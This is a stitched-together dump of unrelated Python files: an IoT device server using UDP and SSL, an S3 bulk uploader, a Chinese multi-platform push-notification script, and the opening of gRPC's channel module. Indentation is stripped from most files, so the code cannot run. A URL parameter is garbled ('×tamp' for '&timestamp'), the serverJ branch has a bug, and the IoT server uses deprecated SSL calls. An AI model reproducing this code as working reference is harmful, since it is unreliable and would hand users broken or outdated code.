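# Minimal usage of the ThreadPool above: jobs queued with ThreadPool.run() are
# picked up by daemon worker threads spawned on demand (bounded by the
# threads_max attribute, which is expected to be set elsewhere and is not shown
# in this excerpt, so it is set explicitly here as an assumption).
if __name__ == "__main__":
    import time
    ThreadPool.threads_max = 2  # assumed attribute, normally configured elsewhere
    def _demo_job(n):
        time.sleep(0.1)
        print("finished job", n)
    for n in range(5):
        ThreadPool.run(_demo_job, (n,))
    time.sleep(1)  # crude wait: daemon workers exit once the job queue drains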
|
iotserver.py
|
from iotcommon import IotUDPHandler
from iotcommon import UdpPacket
import datetime
import iotcommon
import SocketServer
import binascii
import logging
import time
import threading
import os
import socket
import ssl
import sys
import json
class IotSession:
TYPE_UDP = 'udp'
TYPE_SSL = 'ssl'
def __init__(self, deviceId, protocol):
self.protocol = protocol
self.deviceId = deviceId
self.clientAddr = None
self.lastUdpMessage = None
self.lastPayload = None
self.sslSocket = None
self.creationTime = datetime.datetime.now()
self.lastUpdateTime = datetime.datetime.now()
self.lock = threading.Lock()
class UdpCounter:
def __init__(self, deviceId, udpSentCounter, udpReceivedCounter):
self.deviceId = deviceId
self.udpSentCounter = udpSentCounter
self.udpReceivedCounter = udpReceivedCounter
class IotServerService:
logger = logging.getLogger()
IOT_PROTOCOL_VERSION = 1
def __init__(self, udpListenAddr, sslListenAddr, masterKey, serverHandler):
self.udpHost, self.udpPort = udpListenAddr.split(':')[0], int(udpListenAddr.split(':')[1])
self.sslHost, self.sslPort = sslListenAddr.split(':')[0], int(sslListenAddr.split(':')[1])
self.udpServer = None
self.udpTimeout = 180
self.sessions = dict()
self.masterKey = masterKey
self.stateFile = 'server.dat'
self.caCertFile = 'servercert.pem'
self.serverCertFile = 'servercert.pem'
self.serverKeyFile = 'serverkey.pem'
self.taskIntervalSecond = 60
self.serverHandler = serverHandler
self.serverHandler.service = self
def start(self):
self.loadState()
self.serverHandler.start()
sslThread = threading.Thread(target = self.startSsl)
sslThread.daemon = True
sslThread.start()
timer = threading.Timer(self.taskIntervalSecond, self.repeat)
timer.daemon = True
timer.start()
self.udpServer = SocketServer.UDPServer((self.udpHost, self.udpPort), IotUDPHandler)
self.logger.info("starting UDP server listening at {0}:{1}".format(self.udpServer.server_address[0], self.udpServer.server_address[1]))
self.udpServer.service = self
self.udpServer.role = IotUDPHandler.SERVER
self.udpServer.serve_forever()
def startSsl(self):
while True:
try:
self.logger.info("starting TCP SSL server listening at {0}:{1}".format(self.sslHost, self.sslPort))
bindsocket = socket.socket()
bindsocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) #bind even if local port is in TIME_WAIT
bindsocket.bind((self.sslHost, self.sslPort))
bindsocket.listen(5)
while True:
newsocket, fromaddr = bindsocket.accept()
try:
self.logger.info("New TCP connection from {0}:{1} - initiating ssl using serverCertFile={2}, serverKeyFile={3}, caCertFile={4}".format(fromaddr[0], fromaddr[1], self.serverCertFile, self.serverKeyFile, self.caCertFile))
sslSocket = ssl.wrap_socket(newsocket, server_side=True,certfile=self.serverCertFile, keyfile=self.serverKeyFile,cert_reqs=ssl.CERT_REQUIRED,ca_certs=self.caCertFile,ssl_version=ssl.PROTOCOL_SSLv23)
sslSocket.settimeout(300)
servercert = sslSocket.getpeercert()
subject = dict(x[0] for x in servercert['subject'])
cn = subject['commonName']
desc = subject['description']
self.logger.info("Client certificate is valid, CN={0}, description={1} - validating deviceId and description".format(cn, desc))
deviceId = str(bytearray.fromhex(cn))
deviceKey = iotcommon.deriveKey(self.masterKey, deviceId)
expectedSignature = binascii.hexlify(iotcommon.hmacsha256(deviceId, deviceKey))
if desc == expectedSignature:
self.logger.debug("certificate signature OK, creating session for device {0} at {1}:{2}".format(cn, fromaddr[0], fromaddr[1]))
if deviceId in self.sessions:
session = self.sessions[deviceId]
session.clientAddr = fromaddr
session.sslSocket = sslSocket
session.lastUpdateTime = datetime.datetime.now()
else:
self.logger.debug(" creating new session for SSL device: %s", binascii.hexlify(deviceId))
session = IotSession(deviceId, IotSession.TYPE_SSL)
session.clientAddr = fromaddr
session.sslSocket = sslSocket
session.lastUpdateTime = datetime.datetime.now()
self.sessions[deviceId] = session
self.logger.debug("Creating thread for handling SSL communication with {0}".format(binascii.hexlify(deviceId)))
connectionThread = threading.Thread(target = self.handleSslCommunication, args = (deviceId, sslSocket))
connectionThread.daemon = True
connectionThread.start()
else:
sslSocket.shutdown(socket.SHUT_RDWR)
sslSocket.close()
self.logger.warning('received invalid signature in certificate description field for device {0}. expected={1}, received={2} - closing connection'.format(cn, binascii.hexlify(expectedSignature), desc))
except Exception as e:
self.logger.exception(e)
try:
newsocket.shutdown(socket.SHUT_RDWR)
newsocket.close()
except:
pass
except Exception as e:
self.logger.exception(e)
time.sleep(10)
def handleSslCommunication(self, deviceId, sslSocket):
try:
while True:
payload = iotcommon.recvMessage(sslSocket)
clientAddr = sslSocket.getpeername()
self.logger.info("Received SSL payload from {0} at {1}:{2}: {3}".format(binascii.hexlify(deviceId), clientAddr[0], clientAddr[1], payload))
if deviceId in self.sessions:
session = self.sessions[deviceId]
else:
self.logger.debug(" creating new session for SSL device: %s", binascii.hexlify(deviceId))
session = IotSession(deviceId, IotSession.TYPE_SSL)
self.sessions[deviceId] = session
session.lastUpdateTime = datetime.datetime.now()
session.lastPayload = payload
session.clientAddr = clientAddr
session.sslSocket = sslSocket
if self.logger.getEffectiveLevel() == logging.DEBUG:
self.dumpSessions()
self.passToHandler(deviceId, payload)
except Exception as e:
self.logger.error("Something went wrong, closing connection")
self.logger.exception(e)
try:
#self.removeSession(deviceId)
self.logger.info("closing connection to deviceId {0}, IP {1}".format(binascii.hexlify(deviceId), sslSocket.getpeername()[0]))
sslSocket.shutdown(socket.SHUT_RDWR)
self.logger.info("connection to deviceId {0}, IP {1} closed".format(binascii.hexlify(deviceId), sslSocket.getpeername()[0]))
sslSocket.close()
except:
pass
def repeat(self):
try:
self.task()
except Exception as e:
self.logger.exception(e)
except:
self.logger.error("error on executing task: {0} ".format(sys.exc_info()[0]))
timer = threading.Timer(self.taskIntervalSecond, self.repeat)
timer.daemon = True
timer.start()
def task(self):
self.saveState()
self.removeInactiveSessions()
def handleUdpMessage(self, message, clientAddr):
self.logger.debug(" handling decoded UDP message from device")
isNewSession = False
if message.deviceId in self.sessions:
session = self.sessions[message.deviceId]
else:
self.logger.debug(" attemping to create new session for UDP device: %s", binascii.hexlify(message.deviceId))
session = IotSession(message.deviceId, IotSession.TYPE_UDP)
isNewSession = True
counter = self.getCounter(message.deviceId)
self.logger.debug(" Validating counters: local={0}, incoming={1}".format(counter.udpReceivedCounter, message.counter1))
if (message.counter1 > counter.udpReceivedCounter):
self.logger.debug(" Counter OK. updating session for device %s", binascii.hexlify(message.deviceId))
session.lastUdpMessage = message
session.lastPayload = message.payload
session.clientAddr = clientAddr
session.lastUpdateTime = datetime.datetime.now()
counter.udpReceivedCounter = message.counter1
if isNewSession:
self.sessions[message.deviceId] = session
self.logger.info("Received valid UDP message from {0}:{1}, deviceId={2}, payload={3}. Calling server handler.".format(clientAddr[0], clientAddr[1], binascii.hexlify(message.deviceId), message.payload))
self.passToHandler(message.deviceId, message.payload)
else:
self.logger.warning("Invalid counter in message from device {0}, local={1}, incoming={2} - discarding".format(binascii.hexlify(message.deviceId), counter.udpReceivedCounter, message.counter1))
def sendMessage(self, deviceId, payload):
self.logger.debug("Attempting do send message to device %s, payload %s", binascii.hexlify(deviceId), payload)
if deviceId in self.sessions:
session = self.sessions[deviceId]
if session.protocol == IotSession.TYPE_UDP:
counter = self.getCounter(deviceId)
message = UdpPacket(deviceId, UdpPacket.SERVER_TO_CLIENT, self.IOT_PROTOCOL_VERSION, counter.udpSentCounter, session.lastUdpMessage.counter1, payload)
deviceKey = iotcommon.deriveKey(self.masterKey, deviceId)
data = message.createPacket(deviceKey)
self.logger.info("Sending {0} bytes in UDP to device {1} at {2}:{3}".format(len(data), binascii.hexlify(message.deviceId), session.clientAddr[0], session.clientAddr[1]))
with session.lock:
self.udpServer.socket.sendto(data, session.clientAddr)
counter.udpSentCounter += 1
self.saveState()
elif session.protocol == IotSession.TYPE_SSL:
self.logger.info("Sending {0} bytes by SSL to device {1} at {2}:{3}".format(len(payload), binascii.hexlify(deviceId), session.clientAddr[0], session.clientAddr[1]))
with session.lock:
iotcommon.sendMessage(session.sslSocket, payload)
else:
self.logger.warning("could not send message to device - device %s is not connected", binascii.hexlify(message.deviceId))
return False
def passToHandler(self, deviceId, payload):
try:
self.serverHandler.handleDeviceCall(deviceId, payload)
payloadDict = json.loads(payload)
ackDict = {"ack":""}
if "mid" in payloadDict:
ackDict["ack"] = payloadDict["mid"]
ackPayload = json.dumps(ackDict)
self.logger.info("Responding to {0} with {1}".format(binascii.hexlify(deviceId), ackPayload))
self.sendMessage(deviceId, ackPayload)
except Exception as e:
self.logger.exception(e)
def removeInactiveSessions(self):
for deviceId, session in self.sessions.items():
secs = (datetime.datetime.now() - session.lastUpdateTime).total_seconds()
if session.protocol == "udp" and secs > self.udpTimeout:
self.logger.info("UDP session for device {0} at {1}:{2} is inactive for {3} - removing".format(binascii.hexlify(deviceId), session.clientAddr[0], session.clientAddr[1], secs))
self.removeSession(deviceId)
def loadState(self):
self.counters = dict()
if not os.path.exists(self.stateFile):
self.logger.warning("State file at {0} doesn't exist. Creating initial empty counters file.".format(self.stateFile))
f = open(self.stateFile, 'w')
f.close()
else:
with open(self.stateFile, 'r') as f:
lines = f.readlines()
for line in lines:
split = line.split(' ')
deviceId = str(bytearray.fromhex(split[0]))
sentCounter = int(split[1])
receivedCounter = int(split[2])
self.counters[deviceId] = UdpCounter(deviceId, sentCounter, receivedCounter)
self.logger.info("{0} record(s) loaded from state file at {1}".format(len(self.counters), self.stateFile))
def saveState(self):
tmpFile = self.stateFile + '.tmp'
with open(tmpFile, 'w') as f:
for deviceId, counter in self.counters.items():
f.write(binascii.hexlify(deviceId) + ' ' + str(counter.udpSentCounter) + ' ' + str(counter.udpReceivedCounter) + '\n')
os.rename(tmpFile, self.stateFile)
self.logger.info("{0} counter(s) saved to file {1}".format(len(self.counters), self.stateFile))
def getCounter(self, deviceId):
if deviceId not in self.counters:
self.counters[deviceId] = UdpCounter(deviceId, 1, 0)
return self.counters[deviceId]
def removeSession(self, deviceId):
try:
sessions = dict(self.sessions)
del sessions[deviceId]
self.sessions = sessions
except:
pass
def dumpSessions(self):
self.logger.debug("currently %d device(s) connected:", len(self.sessions))
for deviceId, session in self.sessions.items():
self.logger.debug(" %s:device %s last updated from %s:%s at %s", session.protocol, binascii.hexlify(deviceId), session.clientAddr[0], session.clientAddr[1], session.lastUpdateTime.strftime('%Y-%m-%d %H:%M:%S'))
|
aws_upload.py
|
import boto3
session = boto3.Session(
aws_access_key_id='<Your access key>',
aws_secret_access_key='<Your secret Key>')
s3 = session.resource('s3')
import threading
from os import listdir
from typing import List
# TODO: Constants to be filled in by the developer
AWS_BUCKET_NAME = ""
AWS_DESTINATION_FOLDER_NAME = ""
LOCAL_SOURCE_FOLDER_NAME = ""
NUMBER_THREADS = 4 # Change this to your convenience
FILES_FOR_SINGLE_THREAD = 1000 # Change this
bucket = s3.Bucket(AWS_BUCKET_NAME)
s3_list = [str(data.key).split("/")[1].strip() if str(data.key).split("/")[0].strip() == AWS_DESTINATION_FOLDER_NAME else "" for data in bucket.objects.all()]
print(f"Got s3 list with length of {len(s3_list)}")
def start_uploading(file_names: List):
for i in file_names:
if i in s3_list:
try:
temp = open(f"{LOCAL_SOURCE_FOLDER_NAME}/{i}", "rb")
object_ = s3.Object(AWS_BUCKET_NAME, f"{AWS_DESTINATION_FOLDER_NAME}/{i}")
object_.put(Body = temp)
temp.close()
except Exception as e:
print(e, i)
else:
print(f"{i} not in the storage")
print("Finished Uploading files")
threads = []
for i in range(0, NUMBER_THREADS):
# list slicing never raises IndexError, so no try/except is needed here;
# each thread gets a non-overlapping chunk of FILES_FOR_SINGLE_THREAD files
files_list = listdir(LOCAL_SOURCE_FOLDER_NAME)[i * FILES_FOR_SINGLE_THREAD:(i + 1) * FILES_FOR_SINGLE_THREAD]
threads.append(threading.Thread(target = start_uploading, args = (files_list,)))
for i in threads: i.start()
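# --- Illustrative sketch (not part of the original script) ---
# The loop above hands each thread a fixed-size slice of the directory listing.
# A hypothetical, equivalent partition helper (not used above); the script could
# also call t.join() on each started thread to wait for all uploads to finish:
def partition(items, size):
    """Split items into consecutive chunks of at most size elements."""
    return [items[i:i + size] for i in range(0, len(items), size)]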
|
notify_mtr_older.py
|
#!/usr/bin/env python3
# _*_ coding:utf-8 _*_
import base64
import hashlib
import hmac
import os
import re
import threading
import time
import urllib.parse
import requests
try:
import json5 as json
except ModuleNotFoundError:
import json
try:
from utils_env import get_file_path
except ModuleNotFoundError:
def get_file_path():
return ""
# The original print function and a lock shared across threads
_print = print
mutex = threading.Lock()
# Define a replacement print function
def print(text, *args, **kw):
"""
Serialize output so that simultaneous printing from multiple threads does not get interleaved.
"""
with mutex:
_print(text, *args, **kw)
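# --- Illustrative sketch (not part of the original script) ---
# With the lock-wrapped print above, concurrent notifier threads can log
# without interleaving their output. A hypothetical demo (not called anywhere):
def _demo_threaded_print():
    ts = [threading.Thread(target=print, args=(f"line {i}",)) for i in range(3)]
    [t.start() for t in ts]
    [t.join() for t in ts]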
# Notification services
# fmt: off
push_config = {
'HITOKOTO': False, # enable Hitokoto (append a random quote)
'BARK_PUSH': '', # bark server address or device key, e.g. https://api.day.app/DxHcxxxxxRxxxxxxcm/
'BARK_ARCHIVE': '', # whether bark pushes are archived
'BARK_GROUP': '', # bark push group
'BARK_SOUND': '', # bark push sound
'CONSOLE': True, # print to the console
'DD_BOT_SECRET': '', # DD_BOT_SECRET of the DingTalk bot
'DD_BOT_TOKEN': '', # DD_BOT_TOKEN of the DingTalk bot
'FSKEY': '', # FSKEY of the Feishu (Lark) bot
'GOBOT_URL': '', # go-cqhttp
# push to a personal QQ: http://127.0.0.1/send_private_msg
# push to a group: http://127.0.0.1/send_group_msg
'GOBOT_QQ': '', # target group or user for go-cqhttp
# when GOBOT_URL is set to /send_private_msg, fill in user_id=<personal QQ>
# when set to /send_group_msg, fill in group_id=<QQ group>
'GOBOT_TOKEN': '', # access_token of go-cqhttp
'IGOT_PUSH_KEY': '', # IGOT_PUSH_KEY for iGot aggregated push
'PUSH_KEY': '', # PUSH_KEY of ServerChan, compatible with both the legacy and the Turbo version
'PUSH_PLUS_TOKEN': '', # user token for push+ WeChat push
'PUSH_PLUS_USER': '', # group code for push+ WeChat push
'QMSG_KEY': '', # QMSG_KEY of Qmsg
'QMSG_TYPE': '', # QMSG_TYPE of Qmsg
'QYWX_AM': '', # WeCom (WeChat Work) application
'QYWX_KEY': '', # WeCom (WeChat Work) bot
'TG_BOT_TOKEN': '', # TG_BOT_TOKEN of the Telegram bot, e.g. 1407203283:AAG9rt-6RDaaX0HBLZQq0laNOh898iFYaRQ
'TG_USER_ID': '', # TG_USER_ID of the Telegram bot, e.g. 1434078534
'TG_API_HOST': '', # Telegram proxy API
'TG_PROXY_AUTH': '', # Telegram proxy authentication parameters
'TG_PROXY_HOST': '', # TG_PROXY_HOST of the Telegram bot proxy
'TG_PROXY_PORT': '', # TG_PROXY_PORT of the Telegram bot proxy
}
notify_function = []
# fmt: on
# First read panel variables or github action runtime variables
for k in push_config:
if os.getenv(k):
v = os.getenv(k)
push_config[k] = v
# Read variables from the config file (these override the environment variables)
CONFIG_PATH = os.getenv("NOTIFY_CONFIG_PATH") or get_file_path("notify.json5")
if os.path.exists(CONFIG_PATH):
print(f"通知配置文件存在:{CONFIG_PATH}。")
try:
for k, v in dict(
json.load(open(CONFIG_PATH, mode="r", encoding="utf-8"))
).items():
if k in push_config:
push_config[k] = v
except ValueError:
print(
f"错误:配置文件 {CONFIG_PATH} 格式不对,请在 https://verytoolz.com/json5-validator.html 中检查格式"
)
elif CONFIG_PATH:
print(f"{CONFIG_PATH} 配置的通知文件不存在,请检查文件位置或删除对应环境变量!")
def bark(title: str, content: str) -> None:
"""
Push a message via bark.
"""
if not push_config.get("BARK_PUSH"):
print("bark 服务的 BARK_PUSH 未设置!!\n取消推送")
return
print("bark 服务启动")
if push_config.get("BARK_PUSH").startswith("http"):
url = f'{push_config.get("BARK_PUSH")}/{urllib.parse.quote_plus(title)}/{urllib.parse.quote_plus(content)}'
else:
url = f'https://api.day.app/{push_config.get("BARK_PUSH")}/{urllib.parse.quote_plus(title)}/{urllib.parse.quote_plus(content)}'
bark_params = {
"BARK_ARCHIVE": "isArchive",
"BARK_GROUP": "group",
"BARK_SOUND": "sound",
}
params = ""
for pair in filter(
lambda pairs: pairs[0].startswith("BARK_")
and pairs[0] != "BARK_PUSH"
and pairs[1]
and bark_params.get(pairs[0]),
push_config.items(),
):
params += f"{bark_params.get(pair[0])}={pair[1]}&"
if params:
url = url + "?" + params.rstrip("&")
response = requests.get(url).json()
if response["code"] == 200:
print("bark 推送成功!")
else:
print("bark 推送失败!")
def console(title: str, content: str) -> None:
"""
Push a message to the console.
"""
print(f"{title}\n\n" f"{content}")
def dingding_bot(title: str, content: str) -> None:
"""
Push a message via the DingTalk bot.
"""
if not push_config.get("DD_BOT_SECRET") or not push_config.get("DD_BOT_TOKEN"):
print("钉钉机器人 服务的 DD_BOT_SECRET 或者 DD_BOT_TOKEN 未设置!!\n取消推送")
return
print("钉钉机器人 服务启动")
timestamp = str(round(time.time() * 1000))
secret_enc = push_config.get("DD_BOT_SECRET").encode("utf-8")
string_to_sign = "{}\n{}".format(timestamp, push_config.get("DD_BOT_SECRET"))
string_to_sign_enc = string_to_sign.encode("utf-8")
hmac_code = hmac.new(
secret_enc, string_to_sign_enc, digestmod=hashlib.sha256
).digest()
sign = urllib.parse.quote_plus(base64.b64encode(hmac_code))
url = f'https://oapi.dingtalk.com/robot/send?access_token={push_config.get("DD_BOT_TOKEN")}×tamp={timestamp}&sign={sign}'
headers = {"Content-Type": "application/json;charset=utf-8"}
data = {"msgtype": "text", "text": {"content": f"{title}\n\n{content}"}}
response = requests.post(
url=url, data=json.dumps(data, quote_keys=True), headers=headers, timeout=15
).json()
if not response["errcode"]:
print("钉钉机器人 推送成功!")
else:
print("钉钉机器人 推送失败!")
def feishu_bot(title: str, content: str) -> None:
"""
Push a message via the Feishu (Lark) bot.
"""
if not push_config.get("FSKEY"):
print("飞书 服务的 FSKEY 未设置!!\n取消推送")
return
print("飞书 服务启动")
url = f'https://open.feishu.cn/open-apis/bot/v2/hook/{push_config.get("FSKEY")}'
data = {"msg_type": "text", "content": {"text": f"{title}\n\n{content}"}}
response = requests.post(url, data=json.dumps(data, quote_keys=True)).json()
if response.get("StatusCode") == 0:
print("飞书 推送成功!")
else:
print("飞书 推送失败!错误信息如下:\n", response)
def go_cqhttp(title: str, content: str) -> None:
"""
Push a message via go-cqhttp.
"""
if not push_config.get("GOBOT_URL") or not push_config.get("GOBOT_QQ"):
print("go-cqhttp 服务的 GOBOT_URL 或 GOBOT_QQ 未设置!!\n取消推送")
return
print("go-cqhttp 服务启动")
url = f'{push_config.get("GOBOT_URL")}?access_token={push_config.get("GOBOT_TOKEN")}&{push_config.get("GOBOT_QQ")}&message=标题:{title}\n内容:{content}'
response = requests.get(url).json()
if response["status"] == "ok":
print("go-cqhttp 推送成功!")
else:
print("go-cqhttp 推送失败!")
def iGot(title: str, content: str) -> None:
"""
Push a message via iGot.
"""
if not push_config.get("IGOT_PUSH_KEY"):
print("iGot 服务的 IGOT_PUSH_KEY 未设置!!\n取消推送")
return
print("iGot 服务启动")
url = f'https://push.hellyw.com/{push_config.get("IGOT_PUSH_KEY")}'
data = {"title": title, "content": content}
headers = {"Content-Type": "application/x-www-form-urlencoded"}
response = requests.post(url, data=data, headers=headers).json()
if response["ret"] == 0:
print("iGot 推送成功!")
else:
print(f'iGot 推送失败!{response["errMsg"]}')
def serverJ(title: str, content: str) -> None:
"""
Push a message via serverJ (ServerChan).
"""
if not push_config.get("PUSH_KEY"):
print("serverJ 服务的 PUSH_KEY 未设置!!\n取消推送")
return
print("serverJ 服务启动")
data = {"text": title, "desp": content.replace("\n", "\n\n")}
if push_config.get("PUSH_KEY").index("SCT") != -1:
url = f'https://sctapi.ftqq.com/{push_config.get("PUSH_KEY")}.send'
else:
url = f'https://sc.ftqq.com/${push_config.get("PUSH_KEY")}.send'
response = requests.post(url, data=data).json()
if response.get("errno") == 0 or response.get("code") == 0:
print("serverJ 推送成功!")
else:
print(f'serverJ 推送失败!错误码:{response["message"]}')
def pushplus_bot(title: str, content: str) -> None:
"""
Push a message via push+.
"""
if not push_config.get("PUSH_PLUS_TOKEN"):
print("PUSHPLUS 服务的 PUSH_PLUS_TOKEN 未设置!!\n取消推送")
return
print("PUSHPLUS 服务启动")
url = "http://www.pushplus.plus/send"
data = {
"token": push_config.get("PUSH_PLUS_TOKEN"),
"title": title,
"content": content,
"topic": push_config.get("PUSH_PLUS_USER"),
}
body = json.dumps(data, quote_keys=True).encode(encoding="utf-8")
headers = {"Content-Type": "application/json"}
response = requests.post(url=url, data=body, headers=headers).json()
if response["code"] == 200:
print("PUSHPLUS 推送成功!")
else:
print("PUSHPLUS 推送失败!")
def qmsg_bot(title: str, content: str) -> None:
"""
Push a message via Qmsg.
"""
if not push_config.get("QMSG_KEY") or not push_config.get("QMSG_TYPE"):
print("qmsg 的 QMSG_KEY 或者 QMSG_TYPE 未设置!!\n取消推送")
return
print("qmsg 服务启动")
url = f'https://qmsg.zendee.cn/{push_config.get("QMSG_TYPE")}/{push_config.get("QMSG_KEY")}'
payload = {"msg": f'{title}\n\n{content.replace("----", "-")}'.encode("utf-8")}
response = requests.post(url=url, params=payload).json()
if response["code"] == 0:
print("qmsg 推送成功!")
else:
print(f'qmsg 推送失败!{response["reason"]}')
def wecom_app(title: str, content: str) -> None:
"""
Push a message via the WeCom (WeChat Work) app.
"""
if not push_config.get("QYWX_AM"):
print("QYWX_AM 未设置!!\n取消推送")
return
QYWX_AM_AY = re.split(",", push_config.get("QYWX_AM"))
if len(QYWX_AM_AY) not in (4, 5):
print("QYWX_AM 设置错误!!\n取消推送")
return
print("企业微信 APP 服务启动")
corpid = QYWX_AM_AY[0]
corpsecret = QYWX_AM_AY[1]
touser = QYWX_AM_AY[2]
agentid = QYWX_AM_AY[3]
try:
media_id = QYWX_AM_AY[4]
except IndexError:
media_id = ""
wx = WeCom(corpid, corpsecret, agentid)
# If media_id is not configured, send as plain text by default
if not media_id:
message = title + "\n\n" + content
response = wx.send_text(message, touser)
else:
response = wx.send_mpnews(title, content, media_id, touser)
if response == "ok":
print("企业微信推送成功!")
else:
print("企业微信推送失败!错误信息如下:\n", response)
class WeCom:
def __init__(self, corpid, corpsecret, agentid):
self.CORPID = corpid
self.CORPSECRET = corpsecret
self.AGENTID = agentid
def get_access_token(self):
url = "https://qyapi.weixin.qq.com/cgi-bin/gettoken"
values = {
"corpid": self.CORPID,
"corpsecret": self.CORPSECRET,
}
req = requests.post(url, params=values)
data = json.loads(req.text)
return data["access_token"]
def send_text(self, message, touser="@all"):
send_url = (
"https://qyapi.weixin.qq.com/cgi-bin/message/send?access_token="
+ self.get_access_token()
)
send_values = {
"touser": touser,
"msgtype": "text",
"agentid": self.AGENTID,
"text": {"content": message},
"safe": "0",
}
send_msges = bytes(json.dumps(send_values, quote_keys=True), "utf-8")
response = requests.post(send_url, send_msges)
response = response.json()
return response["errmsg"]
def send_mpnews(self, title, message, media_id, touser="@all"):
send_url = (
"https://qyapi.weixin.qq.com/cgi-bin/message/send?access_token="
+ self.get_access_token()
)
send_values = {
"touser": touser,
"msgtype": "mpnews",
"agentid": self.AGENTID,
"mpnews": {
"articles": [
{
"title": title,
"thumb_media_id": media_id,
"author": "Author",
"content_source_url": "",
"content": message.replace("\n", "<br/>"),
"digest": message,
}
]
},
}
send_msges = bytes(json.dumps(send_values, quote_keys=True), "utf-8")
response = requests.post(send_url, send_msges)
response = response.json()
return response["errmsg"]
def wecom_bot(title: str, content: str) -> None:
"""
Push a message via the WeCom (WeChat Work) bot.
"""
if not push_config.get("QYWX_KEY"):
print("企业微信机器人 服务的 QYWX_KEY 未设置!!\n取消推送")
return
print("企业微信机器人服务启动")
url = f"https://qyapi.weixin.qq.com/cgi-bin/webhook/send?key={push_config.get('QYWX_KEY')}"
headers = {"Content-Type": "application/json;charset=utf-8"}
data = {"msgtype": "text", "text": {"content": f"{title}\n\n{content}"}}
response = requests.post(
url=url, data=json.dumps(data, quote_keys=True), headers=headers, timeout=15
).json()
if response["errcode"] == 0:
print("企业微信机器人推送成功!")
else:
print("企业微信机器人推送失败!")
def telegram_bot(title: str, content: str) -> None:
"""
Push a message via the Telegram bot.
"""
if not push_config.get("TG_BOT_TOKEN") or not push_config.get("TG_USER_ID"):
print("tg 服务的 bot_token 或者 user_id 未设置!!\n取消推送")
return
print("tg 服务启动")
if push_config.get("TG_API_HOST"):
url = f"https://{push_config.get('TG_API_HOST')}/bot{push_config.get('TG_BOT_TOKEN')}/sendMessage"
else:
url = (
f"https://api.telegram.org/bot{push_config.get('TG_BOT_TOKEN')}/sendMessage"
)
headers = {"Content-Type": "application/x-www-form-urlencoded"}
payload = {
"chat_id": str(push_config.get("TG_USER_ID")),
"text": f"{title}\n\n{content}",
"disable_web_page_preview": "true",
}
proxies = None
if push_config.get("TG_PROXY_HOST") and push_config.get("TG_PROXY_PORT"):
if push_config.get("TG_PROXY_AUTH") is not None and "@" not in push_config.get(
"TG_PROXY_HOST"
):
push_config["TG_PROXY_HOST"] = (
push_config.get("TG_PROXY_AUTH")
+ "@"
+ push_config.get("TG_PROXY_HOST")
)
proxyStr = "http://{}:{}".format(
push_config.get("TG_PROXY_HOST"), push_config.get("TG_PROXY_PORT")
)
proxies = {"http": proxyStr, "https": proxyStr}
response = requests.post(
url=url, headers=headers, params=payload, proxies=proxies
).json()
if response["ok"]:
print("tg 推送成功!")
else:
print("tg 推送失败!")
def one() -> str:
"""
Fetch a single Hitokoto quote.
:return:
"""
url = "https://v1.hitokoto.cn/"
res = requests.get(url).json()
return res["hitokoto"] + " ----" + res["from"]
if push_config.get("BARK_PUSH"):
notify_function.append(bark)
if push_config.get("CONSOLE"):
notify_function.append(console)
if push_config.get("DD_BOT_TOKEN") and push_config.get("DD_BOT_SECRET"):
notify_function.append(dingding_bot)
if push_config.get("FSKEY"):
notify_function.append(feishu_bot)
if push_config.get("GOBOT_URL") and push_config.get("GOBOT_QQ"):
notify_function.append(go_cqhttp)
if push_config.get("IGOT_PUSH_KEY"):
notify_function.append(iGot)
if push_config.get("PUSH_KEY"):
notify_function.append(serverJ)
if push_config.get("PUSH_PLUS_TOKEN"):
notify_function.append(pushplus_bot)
if push_config.get("QMSG_KEY") and push_config.get("QMSG_TYPE"):
notify_function.append(qmsg_bot)
if push_config.get("QYWX_AM"):
notify_function.append(wecom_app)
if push_config.get("QYWX_KEY"):
notify_function.append(wecom_bot)
if push_config.get("TG_BOT_TOKEN") and push_config.get("TG_USER_ID"):
notify_function.append(telegram_bot)
def excepthook(args, /):
if issubclass(args.exc_type, requests.exceptions.RequestException):
print(
f"网络异常,请检查你的网络连接、推送服务器和代理配置,该错误和账号配置无关。信息:{str(args.exc_type)}, {args.thread.name}"
)
else:
global default_hook
default_hook(args)
default_hook = threading.excepthook
threading.excepthook = excepthook
def send(title: str, content: str) -> None:
if not content:
print(f"{title} 推送内容为空!")
return
hitokoto = push_config.get("HITOKOTO")
text = one() if hitokoto else ""
content += "\n\n" + text
ts = [
threading.Thread(target=mode, args=(title, content), name=mode.__name__)
for mode in notify_function
]
[t.start() for t in ts]
[t.join() for t in ts]
def main():
send("title", "content")
if __name__ == "__main__":
main()
|
_channel.py
|
# Copyright 2016 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Invocation-side implementation of gRPC Python."""
import logging
import sys
import threading
import time
import grpc
from grpc import _compression
from grpc import _common
from grpc import _grpcio_metadata
from grpc._cython import cygrpc
_LOGGER = logging.getLogger(__name__)
_USER_AGENT = 'grpc-python/{}'.format(_grpcio_metadata.__version__)
_EMPTY_FLAGS = 0
_UNARY_UNARY_INITIAL_DUE = (
cygrpc.OperationType.send_initial_metadata,
cygrpc.OperationType.send_message,
cygrpc.OperationType.send_close_from_client,
cygrpc.OperationType.receive_initial_metadata,
cygrpc.OperationType.receive_message,
cygrpc.OperationType.receive_status_on_client,
)
_UNARY_STREAM_INITIAL_DUE = (
cygrpc.OperationType.send_initial_metadata,
cygrpc.OperationType.send_message,
cygrpc.OperationType.send_close_from_client,
cygrpc.OperationType.receive_initial_metadata,
cygrpc.OperationType.receive_status_on_client,
)
_STREAM_UNARY_INITIAL_DUE = (
cygrpc.OperationType.send_initial_metadata,
cygrpc.OperationType.receive_initial_metadata,
cygrpc.OperationType.receive_message,
cygrpc.OperationType.receive_status_on_client,
)
_STREAM_STREAM_INITIAL_DUE = (
cygrpc.OperationType.send_initial_metadata,
cygrpc.OperationType.receive_initial_metadata,
cygrpc.OperationType.receive_status_on_client,
)
_CHANNEL_SUBSCRIPTION_CALLBACK_ERROR_LOG_MESSAGE = (
'Exception calling channel subscription callback!')
_OK_RENDEZVOUS_REPR_FORMAT = ('<_Rendezvous of RPC that terminated with:\n'
'\tstatus = {}\n'
'\tdetails = "{}"\n'
'>')
